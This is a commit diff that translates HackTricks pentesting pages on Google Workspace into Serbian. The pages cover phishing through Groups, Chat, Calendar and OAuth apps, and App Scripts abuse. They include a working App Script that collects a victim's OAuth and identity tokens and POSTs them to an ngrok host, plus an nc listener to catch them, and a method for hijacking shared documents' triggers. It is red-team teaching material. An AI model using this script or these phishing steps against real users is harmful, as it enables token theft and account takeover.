Translated ['.github/pull_request_template.md', 'src/pentesting-cloud/az

This commit is contained in:
Translator
2024-12-31 19:00:04 +00:00
parent 7770a50092
commit 10e2881a9b
244 changed files with 8499 additions and 11339 deletions
@@ -6,7 +6,7 @@
### Google Platforms and OAuth Apps Phishing
Check how you could use different Google platforms such as Drive, Chat, Groups... to send the victim a phishing link and how to perform a Google OAuth Phishing in:
Proverite kako možete koristiti različite Google platforme kao što su Drive, Chat, Groups... da pošaljete žrtvi phishing link i kako da izvršite Google OAuth Phishing u:
{{#ref}}
gws-google-platforms-phishing/
@@ -14,11 +14,11 @@ gws-google-platforms-phishing/
### Password Spraying
In order to test passwords with all the emails you found (or you have generated based in a email name pattern you might have discover) you could use a tool like [**https://github.com/ustayready/CredKing**](https://github.com/ustayready/CredKing) (although it looks unmaintained) which will use AWS lambdas to change IP address.
Da biste testirali lozinke sa svim emailovima koje ste pronašli (ili koje ste generisali na osnovu obrazaca imena emaila koje ste možda otkrili), možete koristiti alat kao što je [**https://github.com/ustayready/CredKing**](https://github.com/ustayready/CredKing) (iako izgleda da nije održavan) koji će koristiti AWS lambde za promenu IP adrese.
## Post-Exploitation
If you have compromised some credentials or the session of the user you can perform several actions to access potential sensitive information of the user and to try to escala privileges:
Ako ste kompromitovali neke kredencijale ili sesiju korisnika, možete izvršiti nekoliko akcija da pristupite potencijalno osetljivim informacijama korisnika i pokušate da eskalirate privilegije:
{{#ref}}
gws-post-exploitation.md
@@ -26,17 +26,17 @@ gws-post-exploitation.md
### GWS <-->GCP Pivoting
Read more about the different techniques to pivot between GWS and GCP in:
Pročitajte više o različitim tehnikama za pivotiranje između GWS i GCP u:
{{#ref}}
../gcp-security/gcp-to-workspace-pivoting/
{{#endref}}
## GWS <--> GCPW | GCDS | Directory Sync (AD & EntraID)
## GWS <--> GCPW | GCDS | Directory Sync (AD & EntraID)
- **GCPW (Google Credential Provider for Windows)**: This is the single sign-on that Google Workspaces provides so users can login in their Windows PCs using **their Workspace credentials**. Moreover, this will **store tokens to access Google Workspace** in some places in the PC.
- **GCDS (Google CLoud DIrectory Sync)**: This is a tool that can be used to **sync your active directory users and groups to your Workspace**. The tool requires the **credentials of a Workspace superuser and privileged AD user**. So, it might be possible to find it inside a domain server that would be synchronising users from time to time.
- **Admin Directory Sync**: It allows you to synchronize users from AD and EntraID in a serverless process from [https://admin.google.com/ac/sync/externaldirectories](https://admin.google.com/ac/sync/externaldirectories).
- **GCPW (Google Credential Provider for Windows)**: Ovo je jedinstveno prijavljivanje koje Google Workspaces pruža tako da korisnici mogu da se prijave na svojim Windows PC-ima koristeći **svoje Workspace kredencijale**. Štaviše, ovo će **čuvati tokene za pristup Google Workspace-u** na nekim mestima na PC-u.
- **GCDS (Google Cloud Directory Sync)**: Ovo je alat koji se može koristiti za **sinhronizaciju vaših korisnika i grupa iz aktivnog direktorijuma sa vašim Workspace-om**. Alat zahteva **kredencijale superkorisnika Workspace-a i privilegovanog AD korisnika**. Tako da, može biti moguće pronaći ga unutar domen servera koji bi povremeno sinhronizovao korisnike.
- **Admin Directory Sync**: Omogućava vam da sinhronizujete korisnike iz AD i EntraID u serverless procesu sa [https://admin.google.com/ac/sync/externaldirectories](https://admin.google.com/ac/sync/externaldirectories).
{{#ref}}
gws-workspace-sync-attacks-gcpw-gcds-gps-directory-sync-with-ad-and-entraid/
@@ -44,7 +44,7 @@ gws-workspace-sync-attacks-gcpw-gcds-gps-directory-sync-with-ad-and-entraid/
## Persistence
If you have compromised some credentials or the session of the user check these options to maintain persistence over it:
Ako ste kompromitovali neke kredencijale ili sesiju korisnika, proverite ove opcije za održavanje postojanosti:
{{#ref}}
gws-persistence.md
@@ -52,26 +52,22 @@ gws-persistence.md
## Account Compromised Recovery
- Log out of all sessions
- Change user password
- Generate new 2FA backup codes
- Remove App passwords
- Remove OAuth apps
- Remove 2FA devices
- Remove email forwarders
- Remove emails filters
- Remove recovery email/phones
- Removed malicious synced smartphones
- Remove bad Android Apps
- Remove bad account delegations
- Odjavite se iz svih sesija
- Promenite lozinku korisnika
- Generišite nove 2FA rezervne kodove
- Uklonite App lozinke
- Uklonite OAuth aplikacije
- Uklonite 2FA uređaje
- Uklonite email prosledjivače
- Uklonite email filtre
- Uklonite email/telefone za oporavak
- Uklonite zlonamerne sinhronizovane pametne telefone
- Uklonite loše Android aplikacije
- Uklonite loše delegacije naloga
## References
- [https://www.youtube-nocookie.com/embed/6AsVUS79gLw](https://www.youtube-nocookie.com/embed/6AsVUS79gLw) - Matthew Bryant - Hacking G Suite: The Power of Dark Apps Script Magic
- [https://www.youtube.com/watch?v=KTVHLolz6cE](https://www.youtube.com/watch?v=KTVHLolz6cE) - Mike Felch and Beau Bullock - OK Google, How do I Red Team GSuite?
- [https://www.youtube.com/watch?v=KTVHLolz6cE](https://www.youtube.com/watch?v=KTVHLolz6cE) - Mike Felch i Beau Bullock - OK Google, Kako da Red Team GSuite?
{{#include ../../banners/hacktricks-training.md}}
@@ -10,70 +10,68 @@ https://book.hacktricks.xyz/generic-methodologies-and-resources/phishing-methodo
## Google Groups Phishing
Apparently, by default, in workspace members [**can create groups**](https://groups.google.com/all-groups) **and invite people to them**. You can then modify the email that will be sent to the user **adding some links.** The **email will come from a google address**, so it will look **legit** and people might click on the link.
Naime, po default-u, članovi u workspace-u [**mogu kreirati grupe**](https://groups.google.com/all-groups) **i pozivati ljude u njih**. Zatim možete izmeniti email koji će biti poslat korisniku **dodajući neke linkove.** **Email će doći sa google adrese**, tako da će izgledati **legitimno** i ljudi bi mogli kliknuti na link.
It's also possible to set the **FROM** address as the **Google group email** to send **more emails to the users inside the group**, like in the following image where the group **`google--support@googlegroups.com`** was created and an **email was sent to all the members** of the group (that were added without any consent)
Takođe je moguće postaviti **FROM** adresu kao **Google grupu email** da se pošalje **više emailova korisnicima unutar grupe**, kao na sledećoj slici gde je grupa **`google--support@googlegroups.com`** kreirana i **email je poslat svim članovima** grupe (koji su dodati bez ikakvog pristanka)
<figure><img src="../../../images/image (5) (1).png" alt=""><figcaption></figcaption></figure>
## Google Chat Phishing
You might be able to either **start a chat** with a person just having their email address or send an **invitation to talk**. Moreover, it's possible to **create a Space** that can have any name (e.g. "Google Support") and **invite** members to it. If they accept they might think that they are talking to Google Support:
Možda ćete moći da **započnete chat** sa osobom samo imajući njihovu email adresu ili da pošaljete **pozivnicu za razgovor**. Štaviše, moguće je **kreirati Space** koji može imati bilo koje ime (npr. "Google Support") i **pozvati** članove u njega. Ako prihvate, mogli bi pomisliti da razgovaraju sa Google podrškom:
<figure><img src="../../../images/image (6).png" alt=""><figcaption></figcaption></figure>
> [!TIP]
> **In my testing however the invited members didn't even receive an invitation.**
> **Međutim, u mom testiranju pozvani članovi nisu čak ni primili pozivnicu.**
You can check how this worked in the past in: [https://www.youtube.com/watch?v=KTVHLolz6cE\&t=904s](https://www.youtube.com/watch?v=KTVHLolz6cE&t=904s)
Možete proveriti kako je to funkcionisalo u prošlosti na: [https://www.youtube.com/watch?v=KTVHLolz6cE\&t=904s](https://www.youtube.com/watch?v=KTVHLolz6cE&t=904s)
## Google Doc Phishing
In the past it was possible to create an **apparently legitimate document** and the in a comment **mention some email (like @user@gmail.com)**. Google **sent an email to that email address** notifying that they were mentioned in the document.\
Nowadays, this doesn't work but if you **give the victim email access to the document** Google will send an email indicating so. This is the message that appears when you mention someone:
U prošlosti je bilo moguće kreirati **naizgled legitimni dokument** i u komentaru **spomenuti neku email adresu (kao što je @user@gmail.com)**. Google **je poslao email toj email adresi** obaveštavajući da su spomenuti u dokumentu.\
Danas, to ne funkcioniše, ali ako **dajte žrtvi pristup dokumentu** Google će poslati email koji to ukazuje. Ovo je poruka koja se pojavljuje kada spomenete nekoga:
<figure><img src="../../../images/image (7).png" alt=""><figcaption></figcaption></figure>
> [!TIP]
> Victims might have protection mechanism that doesn't allow that emails indicating that an external document was shared with them reach their email.
> Žrtve mogu imati mehanizam zaštite koji ne dozvoljava da emailovi koji ukazuju da je eksterni dokument podeljen sa njima stignu do njihove email adrese.
## Google Calendar Phishing
You can **create a calendar event** and add as many email address of the company you are attacking as you have. Schedule this calendar event in **5 or 15 min** from the current time. Make the event look legit and **put a comment and a title indicating that they need to read something** (with the **phishing link**).
Možete **kreirati kalendarski događaj** i dodati koliko god email adresa kompanije koju napadate imate. Zakazujte ovaj kalendarski događaj u **5 ili 15 minuta** od trenutnog vremena. Neka događaj izgleda legitimno i **stavite komentar i naslov koji ukazuje da treba da pročitaju nešto** (sa **phishing linkom**).
This is the alert that will appear in the browser with a meeting title "Firing People", so you could set a more phishing like title (and even change the name associated with your email).
Ovo je upozorenje koje će se pojaviti u pretraživaču sa naslovom sastanka "Otpustiti ljude", tako da biste mogli postaviti naslov koji više liči na phishing (i čak promeniti ime povezano sa vašom email adresom).
<figure><img src="../../../images/image (8).png" alt=""><figcaption></figcaption></figure>
To make it look less suspicious:
Da bi izgledalo manje sumnjivo:
- Set it up so that **receivers cannot see the other people invited**
- Do **NOT send emails notifying about the event**. Then, the people will only see their warning about a meeting in 5mins and that they need to read that link.
- Apparently using the API you can set to **True** that **people** have **accepted** the event and even create **comments on their behalf**.
- Postavite tako da **primalaci ne mogu videti druge ljude pozvane**
- **NE šaljite emailove koji obaveštavaju o događaju**. Tada će ljudi samo videti svoje upozorenje o sastanku za 5 minuta i da treba da pročitaju taj link.
- Naime, koristeći API možete postaviti na **True** da su **ljudi** **prihvatili** događaj i čak kreirati **komentare u njihovo ime**.
## App Scripts Redirect Phishing
It's possible to create a script in [https://script.google.com/](https://script.google.com/) and **expose it as a web application accessible by everyone** that will use the legit domain **`script.google.com`**.\
The with some code like the following an attacker could make the script load arbitrary content in this page without stop accessing the domain:
Moguće je kreirati skriptu na [https://script.google.com/](https://script.google.com/) i **izložiti je kao web aplikaciju dostupnu svima** koja će koristiti legitimnu domenu **`script.google.com`**.\
Sa nekim kodom poput sledećeg, napadač bi mogao napraviti da skripta učita proizvoljan sadržaj na ovoj stranici bez prestanka pristupajući domeni:
```javascript
function doGet() {
return HtmlService.createHtmlOutput(
'<meta http-equiv="refresh" content="0;url=https://cloud.hacktricks.xyz/pentesting-cloud/workspace-security/gws-google-platforms-phishing#app-scripts-redirect-phishing">'
).setXFrameOptionsMode(HtmlService.XFrameOptionsMode.ALLOWALL)
return HtmlService.createHtmlOutput(
'<meta http-equiv="refresh" content="0;url=https://cloud.hacktricks.xyz/pentesting-cloud/workspace-security/gws-google-platforms-phishing#app-scripts-redirect-phishing">'
).setXFrameOptionsMode(HtmlService.XFrameOptionsMode.ALLOWALL)
}
```
For example accessing [https://script.google.com/macros/s/AKfycbwuLlzo0PUaT63G33MtE6TbGUNmTKXCK12o59RKC7WLkgBTyltaS3gYuH_ZscKQTJDC/exec](https://script.google.com/macros/s/AKfycbwuLlzo0PUaT63G33MtE6TbGUNmTKXCK12o59RKC7WLkgBTyltaS3gYuH_ZscKQTJDC/exec) you will see:
<figure><img src="../../../images/image (4) (1).png" alt=""><figcaption></figcaption></figure>
> [!TIP]
> Note that a warning will appear as the content is loaded inside an iframe.
> Imajte na umu da će se pojaviti upozorenje dok se sadržaj učitava unutar iframe-a.
## App Scripts OAuth Phishing
It's possible to create App Scripts attached to documents to try to get access over a victims OAuth token, for more information check:
Moguće je kreirati App Scripts povezane sa dokumentima kako bi se pokušao dobiti pristup žrtvinom OAuth tokenu, za više informacija pogledajte:
{{#ref}}
gws-app-scripts.md
@@ -81,89 +79,83 @@ gws-app-scripts.md
## OAuth Apps Phishing
Any of the previous techniques might be used to make the user access a **Google OAuth application** that will **request** the user some **access**. If the user **trusts** the **source** he might **trust** the **application** (even if it's asking for high privileged permissions).
Bilo koja od prethodnih tehnika može se koristiti da se korisnik natera da pristupi **Google OAuth aplikaciji** koja će **tražiti** od korisnika neki **pristup**. Ako korisnik **veruje** **izvoru**, može **verovati** i **aplikaciji** (čak i ako traži visoke privilegije).
> [!NOTE]
> Note that Google presents an ugly prompt asking warning that the application is untrusted in several cases and Workspace admins can even prevent people accepting OAuth applications.
> Imajte na umu da Google prikazuje ružnu poruku upozorenja da je aplikacija nepouzdana u nekoliko slučajeva, a Workspace administratori čak mogu sprečiti ljude da prihvate OAuth aplikacije.
**Google** allows to create applications that can **interact on behalf users** with several **Google services**: Gmail, Drive, GCP...
**Google** omogućava kreiranje aplikacija koje mogu **interagovati u ime korisnika** sa nekoliko **Google servisa**: Gmail, Drive, GCP...
When creating an application to **act on behalf other users**, the developer needs to create an **OAuth app inside GCP** and indicate the scopes (permissions) the app needs to access the users data.\
When a **user** wants to **use** that **application**, they will be **prompted** to **accept** that the application will have access to their data specified in the scopes.
Kada se kreira aplikacija da **deluje u ime drugih korisnika**, programer treba da kreira **OAuth aplikaciju unutar GCP** i da označi opsege (dozvole) koje aplikacija treba da pristupi podacima korisnika.\
Kada **korisnik** želi da **koristi** tu **aplikaciju**, biće **upitan** da **prihvati** da će aplikacija imati pristup njihovim podacima navedenim u opsezima.
This is a very juicy way to **phish** non-technical users into using **applications that access sensitive information** because they might not understand the consequences. However, in organizations accounts, there are ways to prevent this from happening.
Ovo je veoma primamljiv način da se **phish** netehnički korisnici u korišćenju **aplikacija koje pristupaju osetljivim informacijama** jer možda ne razumeju posledice. Međutim, u organizacijama postoje načini da se to spreči.
### Unverified App prompt
As it was mentioned, google will always present a **prompt to the user to accept** the permissions they are giving the application on their behalf. However, if the application is considered **dangerous**, google will show **first** a **prompt** indicating that it's **dangerous** and **making it more difficult** for the user to grant the permissions to the app.
Kao što je pomenuto, Google će uvek prikazati **poruku korisniku da prihvati** dozvole koje daju aplikaciji u njihovo ime. Međutim, ako se aplikacija smatra **opasnom**, Google će prvo prikazati **poruku** koja ukazuje da je **opasna** i **otežava** korisniku da odobri dozvole aplikaciji.
This prompt appears in apps that:
Ova poruka se pojavljuje u aplikacijama koje:
- Use any scope that can access private data (Gmail, Drive, GCP, BigQuery...)
- Apps with less than 100 users (apps > 100 a review process is also needed to stop showing the unverified prompt)
- Koriste bilo koji opseg koji može pristupiti privatnim podacima (Gmail, Drive, GCP, BigQuery...)
- Aplikacije sa manje od 100 korisnika (aplikacije > 100 zahtevaju proces pregleda da bi prestale da prikazuju neproverenu poruku)
### Interesting Scopes
[**Here**](https://developers.google.com/identity/protocols/oauth2/scopes) you can find a list of all the Google OAuth scopes.
[**Ovde**](https://developers.google.com/identity/protocols/oauth2/scopes) možete pronaći listu svih Google OAuth opsega.
- **cloud-platform**: View and manage your data across **Google Cloud Platform** services. You can impersonate the user in GCP.
- **admin.directory.user.readonly**: See and download your organization's GSuite directory. Get names, phones, calendar URLs of all the users.
- **cloud-platform**: Pregledajte i upravljajte svojim podacima širom **Google Cloud Platform** servisa. Možete se pretvarati da ste korisnik u GCP.
- **admin.directory.user.readonly**: Vidite i preuzmite direktorijum GSuite vaše organizacije. Dobijate imena, telefone, URL-ove kalendara svih korisnika.
### Create an OAuth App
**Start creating an OAuth Client ID**
**Započnite kreiranje OAuth Client ID**
1. Go to [https://console.cloud.google.com/apis/credentials/oauthclient](https://console.cloud.google.com/apis/credentials/oauthclient) and click on configure the consent screen.
2. Then, you will be asked if the **user type** is **internal** (only for people in your org) or **external**. Select the one that suits your needs
- Internal might be interesting you have already compromised a user of the organization and you are creating this App to phish another one.
3. Give a **name** to the app, a **support email** (note that you can set a googlegroup email to try to anonymize yourself a bit more), a **logo**, **authorized domains** and another **email** for **updates**.
4. **Select** the **OAuth scopes**.
- This page is divided in non sensitive permissions, sensitive permissions and restricted permissions. Eveytime you add a new permisison it's added on its category. Depending on the requested permissions different prompt will appear to the user indicating how sensitive these permissions are.
- Both **`admin.directory.user.readonly`** and **`cloud-platform`** are sensitive permissions.
5. **Add the test users.** As long as the status of the app is testing, only these users are going to be able to access the app so make sure to **add the email you are going to be phishing**.
1. Idite na [https://console.cloud.google.com/apis/credentials/oauthclient](https://console.cloud.google.com/apis/credentials/oauthclient) i kliknite na konfiguraciju ekrana za pristanak.
2. Zatim, bićete upitani da li je **tip korisnika** **interni** (samo za ljude u vašoj organizaciji) ili **eksterni**. Izaberite onaj koji odgovara vašim potrebama
- Interni može biti zanimljiv ako ste već kompromitovali korisnika organizacije i kreirate ovu aplikaciju da biste phishingovali drugog.
3. Dajte **ime** aplikaciji, **email za podršku** (imajte na umu da možete postaviti googlegroup email da biste pokušali da se malo više anonimizujete), **logo**, **ovlašćene domene** i drugi **email** za **ažuriranja**.
4. **Izaberite** **OAuth opsege**.
- Ova stranica je podeljena na neosetljive dozvole, osetljive dozvole i ograničene dozvole. Svaki put kada dodate novu dozvolu, ona se dodaje u svoju kategoriju. U zavisnosti od traženih dozvola, različite poruke će se pojaviti korisniku ukazujući na to koliko su te dozvole osetljive.
- I **`admin.directory.user.readonly`** i **`cloud-platform`** su osetljive dozvole.
5. **Dodajte test korisnike.** Dok je status aplikacije testiranje, samo će ovi korisnici moći da pristupe aplikaciji, pa se pobrinite da **dodate email koji ćete phishingovati**.
Now let's get **credentials for a web application** using the **previously created OAuth Client ID**:
Sada hajde da **dobijemo kredencijale za web aplikaciju** koristeći **prethodno kreirani OAuth Client ID**:
1. Go back to [https://console.cloud.google.com/apis/credentials/oauthclient](https://console.cloud.google.com/apis/credentials/oauthclient), a different option will appear this time.
2. Select to **create credentials for a Web application**
3. Set needed **Javascript origins** and **redirect URIs**
- You can set in both something like **`http://localhost:8000/callback`** for testing
4. Get your application **credentials**
Finally, lets **run a web application that will use the OAuth application credentials**. You can find an example in [https://github.com/carlospolop/gcp_oauth_phishing_example](https://github.com/carlospolop/gcp_oauth_phishing_example).
1. Vratite se na [https://console.cloud.google.com/apis/credentials/oauthclient](https://console.cloud.google.com/apis/credentials/oauthclient), ovoga puta će se pojaviti druga opcija.
2. Izaberite da **kreirate kredencijale za web aplikaciju**
3. Postavite potrebne **Javascript izvore** i **URI za preusmeravanje**
- Možete postaviti u oba nešto poput **`http://localhost:8000/callback`** za testiranje
4. Dobijte svoje aplikacione **kredencijale**
Na kraju, hajde da **pokrenemo web aplikaciju koja će koristiti kredencijale OAuth aplikacije**. Možete pronaći primer na [https://github.com/carlospolop/gcp_oauth_phishing_example](https://github.com/carlospolop/gcp_oauth_phishing_example).
```bash
git clone ttps://github.com/carlospolop/gcp_oauth_phishing_example
cd gcp_oauth_phishing_example
pip install flask requests google-auth-oauthlib
python3 app.py --client-id "<client_id>" --client-secret "<client_secret>"
```
Go to **`http://localhost:8000`** click on the Login with Google button, you will be **prompted** with a message like this one:
Idite na **`http://localhost:8000`**, kliknite na dugme Prijavite se sa Google-om, bićete **upitani** sa porukom poput ove:
<figure><img src="../../../images/image (333).png" alt=""><figcaption></figcaption></figure>
The application will show the **access and refresh token** than can be easily used. For more information about **how to use these tokens check**:
Aplikacija će prikazati **access i refresh token** koji se mogu lako koristiti. Za više informacija o **kako koristiti ove tokene proverite**:
{{#ref}}
../../gcp-security/gcp-persistence/gcp-non-svc-persistance.md
{{#endref}}
#### Using `glcoud`
#### Korišćenje `glcoud`
It's possible to do something using gcloud instead of the web console, check:
Moguće je uraditi nešto koristeći gcloud umesto web konzole, proverite:
{{#ref}}
../../gcp-security/gcp-privilege-escalation/gcp-clientauthconfig-privesc.md
{{#endref}}
## References
## Reference
- [https://www.youtube-nocookie.com/embed/6AsVUS79gLw](https://www.youtube-nocookie.com/embed/6AsVUS79gLw) - Matthew Bryant - Hacking G Suite: The Power of Dark Apps Script Magic
- [https://www.youtube.com/watch?v=KTVHLolz6cE](https://www.youtube.com/watch?v=KTVHLolz6cE) - Mike Felch and Beau Bullock - OK Google, How do I Red Team GSuite?
- [https://www.youtube.com/watch?v=KTVHLolz6cE](https://www.youtube.com/watch?v=KTVHLolz6cE) - Mike Felch i Beau Bullock - OK Google, Kako da Red Team GSuite?
{{#include ../../../banners/hacktricks-training.md}}
@@ -4,236 +4,224 @@
## App Scripts
App Scripts is **code that will be triggered when a user with editor permission access the doc the App Script is linked with** and after **accepting the OAuth prompt**.\
They can also be set to be **executed every certain time** by the owner of the App Script (Persistence).
App Scripts je **kod koji će se aktivirati kada korisnik sa dozvolom za uređivanje pristupi dokumentu sa kojim je povezan App Script** i nakon **prihvatanja OAuth prompta**.\
Takođe se mogu postaviti da se **izvršavaju svakog određenog vremena** od strane vlasnika App Script-a (Persistencija).
### Create App Script
### Kreirajte App Script
There are several ways to create an App Script, although the most common ones are f**rom a Google Document (of any type)** and as a **standalone project**:
Postoji nekoliko načina za kreiranje App Script-a, iako su najčešći **iz Google dokumenta (bilo koje vrste)** i kao **samostalni projekat**:
<details>
<summary>Create a container-bound project from Google Docs, Sheets, or Slides</summary>
<summary>Kreirajte projekat vezan za kontejner iz Google Docs, Sheets ili Slides</summary>
1. Open a Docs document, a Sheets spreadsheet, or Slides presentation.
2. Click **Extensions** > **Google Apps Script**.
3. In the script editor, click **Untitled project**.
4. Give your project a name and click **Rename**.
1. Otvorite Docs dokument, Sheets tabelu ili Slides prezentaciju.
2. Kliknite na **Ekstenzije** > **Google Apps Script**.
3. U editoru skripti, kliknite na **Nepotpisani projekat**.
4. Dajte svom projektu ime i kliknite na **Preimenuj**.
</details>
<details>
<summary>Create a standalone project</summary>
<summary>Kreirajte samostalni projekat</summary>
To create a standalone project from Apps Script:
Da biste kreirali samostalni projekat iz Apps Script-a:
1. Go to [`script.google.com`](https://script.google.com/).
2. Click add **New Project**.
3. In the script editor, click **Untitled project**.
4. Give your project a name and click **Rename**.
1. Idite na [`script.google.com`](https://script.google.com/).
2. Kliknite na **Novi projekat**.
3. U editoru skripti, kliknite na **Nepotpisani projekat**.
4. Dajte svom projektu ime i kliknite na **Preimenuj**.
</details>
<details>
<summary>Create a standalone project from Google Drive</summary>
<summary>Kreirajte samostalni projekat iz Google Drive-a</summary>
1. Open [Google Drive](https://drive.google.com/).
2. Click **New** > **More** > **Google Apps Script**.
1. Otvorite [Google Drive](https://drive.google.com/).
2. Kliknite na **Novi** > **Više** > **Google Apps Script**.
</details>
<details>
<summary>Create a container-bound project from Google Forms</summary>
<summary>Kreirajte projekat vezan za kontejner iz Google Forms</summary>
1. Open a form in Google Forms.
2. Click More more_vert > **Script editor**.
3. In the script editor, click **Untitled project**.
4. Give your project a name and click **Rename**.
1. Otvorite obrazac u Google Forms.
2. Kliknite na Više more_vert > **Editor skripti**.
3. U editoru skripti, kliknite na **Nepotpisani projekat**.
4. Dajte svom projektu ime i kliknite na **Preimenuj**.
</details>
<details>
<summary>Create a standalone project using the clasp command line tool</summary>
<summary>Kreirajte samostalni projekat koristeći clasp komandnu liniju</summary>
`clasp` is a command line tool that allows you create, pull/push, and deploy Apps Script projects from a terminal.
`clasp` je alat komandne linije koji vam omogućava da kreirate, povlačite/pomerate i implementirate Apps Script projekte iz terminala.
See the [Command Line Interface using `clasp` guide](https://developers.google.com/apps-script/guides/clasp) for more details.
Pogledajte [Vodič za komandnu liniju koristeći `clasp`](https://developers.google.com/apps-script/guides/clasp) za više detalja.
</details>
## App Script Scenario <a href="#create-using-clasp" id="create-using-clasp"></a>
## Scenarijo App Script <a href="#create-using-clasp" id="create-using-clasp"></a>
### Create Google Sheet with App Script
### Kreirajte Google Sheet sa App Script-om
Start by crating an App Script, my recommendation for this scenario is to create a Google Sheet and go to **`Extensions > App Scripts`**, this will open a **new App Script for you linked to the sheet**.
Započnite kreiranjem App Script-a, moja preporuka za ovaj scenario je da kreirate Google Sheet i idete na **`Ekstenzije > App Scripts`**, ovo će otvoriti **novi App Script za vas povezan sa tabelom**.
### Leak token
In order to give access to the OAuth token you need to click on **`Services +` and add scopes like**:
Da biste omogućili pristup OAuth tokenu, potrebno je da kliknete na **`Servisi +` i dodate opsege kao**:
- **AdminDirectory**: Access users and groups of the directory (if the user has enough permissions)
- **Gmail**: To access gmail data
- **Drive**: To access drive data
- **Google Sheets API**: So it works with the trigger
To change yourself the **needed scopes** you can go to project settings and enable: **`Show "appsscript.json" manifest file in editor`.**
- **AdminDirectory**: Pristup korisnicima i grupama u direktorijumu (ako korisnik ima dovoljno dozvola)
- **Gmail**: Da biste pristupili gmail podacima
- **Drive**: Da biste pristupili podacima sa diska
- **Google Sheets API**: Da bi radilo sa okidačem
Da biste promenili **potrebne opsege**, možete otići na podešavanja projekta i omogućiti: **`Prikaži "appsscript.json" manifest fajl u editoru`.**
```javascript
function getToken() {
var userEmail = Session.getActiveUser().getEmail()
var domain = userEmail.substring(userEmail.lastIndexOf("@") + 1)
var oauthToken = ScriptApp.getOAuthToken()
var identityToken = ScriptApp.getIdentityToken()
var userEmail = Session.getActiveUser().getEmail()
var domain = userEmail.substring(userEmail.lastIndexOf("@") + 1)
var oauthToken = ScriptApp.getOAuthToken()
var identityToken = ScriptApp.getIdentityToken()
// Data json
data = {
oauthToken: oauthToken,
identityToken: identityToken,
email: userEmail,
domain: domain,
}
// Data json
data = {
oauthToken: oauthToken,
identityToken: identityToken,
email: userEmail,
domain: domain,
}
// Send data
makePostRequest(data)
// Send data
makePostRequest(data)
// Use the APIs, if you don't even if the have configured them in appscript.json the App script won't ask for permissions
// Use the APIs, if you don't even if the have configured them in appscript.json the App script won't ask for permissions
// To ask for AdminDirectory permissions
var pageToken = ""
page = AdminDirectory.Users.list({
domain: domain, // Use the extracted domain
orderBy: "givenName",
maxResults: 100,
pageToken: pageToken,
})
// To ask for AdminDirectory permissions
var pageToken = ""
page = AdminDirectory.Users.list({
domain: domain, // Use the extracted domain
orderBy: "givenName",
maxResults: 100,
pageToken: pageToken,
})
// To ask for gmail permissions
var threads = GmailApp.getInboxThreads(0, 10)
// To ask for gmail permissions
var threads = GmailApp.getInboxThreads(0, 10)
// To ask for drive permissions
var files = DriveApp.getFiles()
// To ask for drive permissions
var files = DriveApp.getFiles()
}
function makePostRequest(data) {
var url = "http://5.tcp.eu.ngrok.io:12027"
var url = "http://5.tcp.eu.ngrok.io:12027"
var options = {
method: "post",
contentType: "application/json",
payload: JSON.stringify(data),
}
var options = {
method: "post",
contentType: "application/json",
payload: JSON.stringify(data),
}
try {
UrlFetchApp.fetch(url, options)
} catch (e) {
Logger.log("Error making POST request: " + e.toString())
}
try {
UrlFetchApp.fetch(url, options)
} catch (e) {
Logger.log("Error making POST request: " + e.toString())
}
}
```
To capture the request you can just run:
Da biste uhvatili zahtev, jednostavno možete pokrenuti:
```bash
ngrok tcp 4444
nc -lv 4444 #macOS
```
Permissions requested to execute the App Script:
<figure><img src="../../../images/image (334).png" alt=""><figcaption></figcaption></figure>
> [!WARNING]
> As an external request is made the OAuth prompt will also **ask to permission to reach external endpoints**.
> Kada se izvrši spoljni zahtev, OAuth prompt će takođe **tražiti dozvolu za pristup spoljnim krajnjim tačkama**.
### Create Trigger
Once the App is read, click on **⏰ Triggers** to create a trigger. As **function** ro tun choose **`getToken`**, runs at deployment **`Head`**, in event source select **`From spreadsheet`** and event type select **`On open`** or **`On edit`** (according to your needs) and save.
Kada se aplikacija pročita, kliknite na **⏰ Triggers** da kreirate okidač. Kao **funkciju** izaberite **`getToken`**, pokreće se na implementaciji **`Head`**, u izvoru događaja izaberite **`From spreadsheet`** i tip događaja izaberite **`On open`** ili **`On edit`** (u zavisnosti od vaših potreba) i sačuvajte.
Note that you can check the **runs of the App Scripts in the Executions tab** if you want to debug something.
Napomena: možete proveriti **izvršenja App Scripts u kartici Executions** ako želite da debagujete nešto.
### Sharing
In order to **trigger** the **App Script** the victim needs to connect with **Editor Access**.
Da bi se **pokrenuo** **App Script**, žrtva treba da se poveže sa **Editor Access**.
> [!TIP]
> The **token** used to execute the **App Script** will be the one of the **creator of the trigger**, even if the file is opened as Editor by other users.
> **Token** koji se koristi za izvršenje **App Script** biće onaj od **kreatora okidača**, čak i ako je datoteka otvorena kao Editor od strane drugih korisnika.
### Abusing Shared With Me documents
> [!CAUTION]
> If someone **shared with you a document with App Scripts and a trigger using the Head** of the App Script (not a fixed deployment), you can modify the App Script code (adding for example the steal token functions), access it, and the **App Script will be executed with the permissions of the user that shared the document with you**! (note that the owners OAuth token will have as access scopes the ones given when the trigger was created).
> Ako vam je neko **podelio dokument sa App Scripts i okidačem koristeći Head** App Script-a (ne fiksnu implementaciju), možete modifikovati kod App Script-a (dodajući, na primer, funkcije za krađu tokena), pristupiti mu, i **App Script će biti izvršen sa dozvolama korisnika koji je podelio dokument sa vama**! (napomena: OAuth token vlasnika će imati pristupne opsege koje su date kada je okidač kreiran).
>
> A **notification will be sent to the creator of the script indicating that someone modified the script** (What about using gmail permissions to generate a filter to prevent the alert?)
> **Obaveštenje će biti poslato kreatoru skripte koje ukazuje da je neko modifikovao skriptu** (Šta mislite o korišćenju gmail dozvola za generisanje filtera kako bi se sprečila upozorenja?)
> [!TIP]
> If an **attacker modifies the scopes of the App Script** the updates **won't be applied** to the document until a **new trigger** with the changes is created. Therefore, an attacker won't be able to steal the owners creator token with more scopes than the one he set in the trigger he created.
> Ako **napadač modifikuje opsege App Script-a**, ažuriranja **neće biti primenjena** na dokument dok se ne kreira **novi okidač** sa izmenama. Stoga, napadač neće moći da ukrade token vlasnika kreatora sa više opsega nego što je postavio u okidaču koji je kreirao.
### Copying instead of sharing
When you create a link to share a document a link similar to this one is created: `https://docs.google.com/spreadsheets/d/1i5[...]aIUD/edit`\
If you **change** the ending **"/edit"** for **"/copy"**, instead of accessing it google will ask you if you want to **generate a copy of the document:**
Kada kreirate link za deljenje dokumenta, kreira se link sličan ovom: `https://docs.google.com/spreadsheets/d/1i5[...]aIUD/edit`\
Ako **promenite** završetak **"/edit"** u **"/copy"**, umesto da mu pristupite, google će vas pitati da li želite da **generišete kopiju dokumenta:**
<figure><img src="../../../images/image (335).png" alt=""><figcaption></figcaption></figure>
